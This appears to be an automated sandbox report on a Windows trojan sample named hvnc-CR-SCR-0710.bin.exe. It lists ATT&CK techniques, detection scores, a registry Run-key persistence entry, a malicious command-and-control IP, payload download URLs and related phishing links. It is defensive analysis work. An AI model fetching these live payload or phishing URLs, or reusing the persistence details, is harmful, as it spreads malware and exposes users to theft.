Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	321 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	213 System Information Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	212 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	621 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	341 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	341 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hvnc-CR-SCR-0710.bin.exe	26%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
hvnc-CR-SCR-0710.bin.exe	34%	Virustotal		Browse
hvnc-CR-SCR-0710.bin.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\msql2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\msql2.exe	26%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Roaming\msql2.exe	34%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
s3-w.us-east-1.amazonaws.com	0%	Virustotal	Browse
bitbucket.org	0%	Virustotal	Browse
bbuseruploads.s3.amazonaws.com	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://github.com/mgravell/protobuf-net	0%	Virustotal		Browse
https://bbuseruploads.s3.amazonaws.com	2%	Virustotal		Browse
https://web-security-reports.services.atlassian.com/csp-report/bb-website	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	0%	Virustotal		Browse
https://payhip.com/infima	0%	Virustotal		Browse
https://payhip.com/infima)	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	0%	Virustotal		Browse
https://bitbucket.org/312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav	0%	Virustotal		Browse
https://dz8aopenkvv6s.cloudfront.net	0%	Virustotal		Browse
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	0%	Virustotal		Browse
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	0%	Virustotal		Browse
https://mathparser.org	0%	Virustotal		Browse
https://mathparser.org/order-commercial-license	0%	Virustotal		Browse
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	0%	Virustotal		Browse
https://stackoverflow.com/q/2152978/23354rCannot	0%	Virustotal		Browse
https://github.com/mgravell/protobuf-netJ	0%	Virustotal		Browse
https://cdn.cookielaw.org/	0%	Virustotal		Browse
https://aui-cdn.atlassian.com/	0%	Virustotal		Browse
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	0%	Virustotal		Browse
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;	0%	Virustotal		Browse
https://github.com/mgravell/protobuf-neti	0%	Virustotal		Browse
https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-	2%	Virustotal		Browse
https://bitbucket.org	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-w.us-east-1.amazonaws.com	3.5.30.95	true	false	0%, Virustotal, Browse	unknown
bitbucket.org	185.166.143.49	true	false	0%, Virustotal, Browse	unknown
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bbuseruploads.s3.amazonaws.com	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034ED000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://stackoverflow.com/q/14436606/23354	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2092862640.0000000002A45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1948776469.0000000004747000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll	InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://github.com/mgravell/protobuf-net	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://payhip.com/infima	msql2.exe.0.dr	false	0%, Virustotal, Browse	unknown
https://payhip.com/infima)	hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr	false	0%, Virustotal, Browse	unknown
https://dz8aopenkvv6s.cloudfront.net	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe	InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe	InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://mathparser.org	msql2.exe.0.dr	false	0%, Virustotal, Browse	unknown
https://mathparser.org/order-commercial-license	msql2.exe.0.dr	false	0%, Virustotal, Browse	unknown
https://github.com/mgravell/protobuf-neti	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://stackoverflow.com/q/2152978/23354rCannot	InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://stackoverflow.com/q/11564914/23354;	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.cookielaw.org/	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://aui-cdn.atlassian.com/	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;	msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003507000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034CC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bitbucket.org	hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034CC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
31.41.244.211	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	true
54.231.232.1	unknown	United States	16509	AMAZON-02US	false
185.166.143.49	bitbucket.org	Germany	16509	AMAZON-02US	false
52.217.90.148	unknown	United States	16509	AMAZON-02US	false
3.5.30.95	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532602
Start date and time:	2024-10-13 18:14:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hvnc-CR-SCR-0710.bin.exe
Detection:	MAL
Classification:	mal100.spyw.evad.winEXE@9/5@4/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 83% Number of executed functions: 574 Number of non-executed functions: 36
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa
Execution Graph export aborted for target InstallUtil.exe, PID 1816 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 3244 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 3384 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:15:00	API Interceptor	23x Sleep call for process: hvnc-CR-SCR-0710.bin.exe modified
12:15:11	API Interceptor	13007100x Sleep call for process: InstallUtil.exe modified
12:15:14	API Interceptor	47x Sleep call for process: msql2.exe modified
17:15:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msql2 C:\Users\user\AppData\Roaming\msql2.exe
17:15:12	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msql2 C:\Users\user\AppData\Roaming\msql2.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
31.41.244.211	SecuriteInfo.com.Trojan.PackedNET.2429.5276.21165.exe	Get hash	malicious	PureLog Stealer	Browse
54.231.232.1	https://www-gemini.net/	Get hash	malicious	Unknown	Browse
185.166.143.49	http://jasonj002.bitbucket.io/	Get hash	malicious	HTMLPhisher	Browse	jasonj002.bitbucket.io/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bitbucket.org	849128312.cmd	Get hash	malicious	Unknown	Browse	185.166.143.48
	z198902873827.exe	Get hash	malicious	DBatLoader, FormBook	Browse	185.166.143.49
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	185.166.143.48
	OTO2wVGgkl.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	https://tiotapas.com.au	Get hash	malicious	Unknown	Browse	185.166.143.48
	GGLoader.exe	Get hash	malicious	Laplas Clipper, SilentCrypto Miner	Browse	185.166.143.49
	file.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	sostener.vbs	Get hash	malicious	Njrat	Browse	185.166.143.50
	sostener.vbs	Get hash	malicious	XWorm	Browse	185.166.143.50
	0XVZC3kfwL.exe	Get hash	malicious	Unknown	Browse	185.166.143.49
s3-w.us-east-1.amazonaws.com	https://steamcommunityv.com/redeemwalletcode/gift/514590383	Get hash	malicious	Unknown	Browse	3.5.27.164
	849128312.cmd	Get hash	malicious	Unknown	Browse	54.231.171.137
	z198902873827.exe	Get hash	malicious	DBatLoader, FormBook	Browse	52.216.35.169
	https://all-seasons-custom-apparel.printavo.com/invoice/d737c3f58fce8a3f391367c903598233?preauth=eyJhbGciOiJSUzI1NiJ9.eyJleHAiOjE3Mjg5MzIwMTYsImlzcyI6NTgzNTkwNywidmVyIjoiY3VzdG9tZXItcHJlYXV0aC12MiIsInBheWFibGUiOiJnaWQ6Ly9wcmludGF2by9PcmRlci8xNjg1NjM0NiJ9.LtnCZuP7zuLtxrc0qbRVc6D_HBV5HHWCYKF01jdBqYuyRzcwCAYTob8CmMYRp7Sn00U104lhcfqDv7qsmGMnOH78EaGpveHtDYtxUOElE7wAp52mtirat1X6dyvgpRhT6-eDCGCiJGzxy-YKbE_aw8K9Fw7pCzHFK5Bt7nHyz1If3LLIeBwZbi0mQUn5emqAgeKnBMJ2XFzw5Q-DA83g9HgPpmp25RoTsyHIpHXM8qV9IeOjy_mBPVDrol9kKUE7ihWInuSSYMoe2wcHXsN_CYjRq-xL5WOOWElhHTzXUkVDNZjQiBTchiuo_h5Ozhh3KZ3eiTryy5PQBER3_8r08A	Get hash	malicious	Unknown	Browse	3.5.29.227
	https://wav-installers.s3.amazonaws.com/Stubs/WaveBrowser_Stub-v1.5.18.3-wpf.exe	Get hash	malicious	Unknown	Browse	3.5.29.250
	https://www.newtonsoft.com/json	Get hash	malicious	Unknown	Browse	52.217.199.177
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	52.217.171.225
	http://sales-agreement-carpal-relative.s3.amazonaws.com/payout/completed/SEKTJGJFFJlfkdjklm4GHKHKYKFLFL/onedrive.html	Get hash	malicious	Unknown	Browse	3.5.27.40
	https://premierbb.sharefile.com/public/share/web-189361297164461c	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	52.217.235.169
	https://issuu.com/ryanrodger/docs/smn8263528?fr=sMTQ5NTc4NTgxNDc	Get hash	malicious	Unknown	Browse	52.216.113.171

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://japroippouquafou-5881.vercel.app/mixc.html	Get hash	malicious	HTMLPhisher	Browse	76.76.21.61
	http://posegulefra-4459.vercel.app/mixcc.html	Get hash	malicious	HTMLPhisher	Browse	76.76.21.98
	https://shawcawebmailserver.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	54.201.56.249
	https://shawri.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	34.247.205.49
	https://shaw-104167.square.site/	Get hash	malicious	HTMLPhisher	Browse	54.201.56.249
	https://currenntlyattyah06.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	52.214.156.76
	http://dmcaactionenforcement.vercel.app/1vWOyN7xZ2xSoDL=KwTQr2qM04lQpteT.html	Get hash	malicious	HTMLPhisher	Browse	76.76.21.98
	https://4thclone-kk.netlify.app/	Get hash	malicious	HTMLPhisher	Browse	18.192.94.96
	http://secureprotocol1.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	54.77.0.81
	http://bervokter-pdf.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	76.76.21.93
AEROEXPRESS-ASRU	SecuriteInfo.com.Trojan.PackedNET.2429.5276.21165.exe	Get hash	malicious	PureLog Stealer	Browse	31.41.244.211
	TVyKPaL2h0.exe	Get hash	malicious	Amadey	Browse	31.41.244.10
	file.exe	Get hash	malicious	RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	31.41.244.11
	https://griffinartdesign.com/	Get hash	malicious	Unknown	Browse	31.41.244.245
	SecuriteInfo.com.Win32.Evo-gen.12679.2695.exe	Get hash	malicious	Amadey, Stealc	Browse	31.41.244.10
	SecuriteInfo.com.Win32.Evo-gen.12679.2695.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	31.41.244.10
	SecuriteInfo.com.Win32.Evo-gen.6752.26418.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	31.41.244.10
	SecuriteInfo.com.Win32.Evo-gen.26545.23661.exe	Get hash	malicious	Amadey, Stealc	Browse	31.41.244.10
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	31.41.244.10
	file.exe	Get hash	malicious	Amadey	Browse	31.41.244.10
AMAZON-02US	https://japroippouquafou-5881.vercel.app/mixc.html	Get hash	malicious	HTMLPhisher	Browse	76.76.21.61
	http://posegulefra-4459.vercel.app/mixcc.html	Get hash	malicious	HTMLPhisher	Browse	76.76.21.98
	https://shawcawebmailserver.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	54.201.56.249
	https://shawri.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	34.247.205.49
	https://shaw-104167.square.site/	Get hash	malicious	HTMLPhisher	Browse	54.201.56.249
	https://currenntlyattyah06.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	52.214.156.76
	http://dmcaactionenforcement.vercel.app/1vWOyN7xZ2xSoDL=KwTQr2qM04lQpteT.html	Get hash	malicious	HTMLPhisher	Browse	76.76.21.98
	https://4thclone-kk.netlify.app/	Get hash	malicious	HTMLPhisher	Browse	18.192.94.96
	http://secureprotocol1.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	54.77.0.81
	http://bervokter-pdf.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	76.76.21.93
AMAZON-02US	https://japroippouquafou-5881.vercel.app/mixc.html	Get hash	malicious	HTMLPhisher	Browse	76.76.21.61
	http://posegulefra-4459.vercel.app/mixcc.html	Get hash	malicious	HTMLPhisher	Browse	76.76.21.98
	https://shawcawebmailserver.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	54.201.56.249
	https://shawri.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	34.247.205.49
	https://shaw-104167.square.site/	Get hash	malicious	HTMLPhisher	Browse	54.201.56.249
	https://currenntlyattyah06.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	52.214.156.76
	http://dmcaactionenforcement.vercel.app/1vWOyN7xZ2xSoDL=KwTQr2qM04lQpteT.html	Get hash	malicious	HTMLPhisher	Browse	76.76.21.98
	https://4thclone-kk.netlify.app/	Get hash	malicious	HTMLPhisher	Browse	18.192.94.96
	http://secureprotocol1.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	54.77.0.81
	http://bervokter-pdf.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	76.76.21.93

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://pub-6e60812ea6034887a73a58b17a92a80f.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95
	https://kucoinexplora.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95
	https://shawri.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95
	https://server.h74w.com/invite/12536668	Get hash	malicious	Unknown	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95
	https://scary-wave.surge.sh/appeal/	Get hash	malicious	Unknown	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95
	https://mail.flndmy-ld-usa.help/icloud-archivos/code2022esp.php	Get hash	malicious	Unknown	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95
	https://business.helpcaseappealcenter.eu/community-standard/346299132520232	Get hash	malicious	Unknown	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95
	https://4thclone-kk.netlify.app/	Get hash	malicious	HTMLPhisher	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95
	http://homeboxmail-6785009.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95
	SecuriteInfo.com.Variant.Cerbu.210262.1524.886.exe	Get hash	malicious	Unknown	Browse	185.166.143.49 52.217.90.148 54.231.232.1 3.5.30.95

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
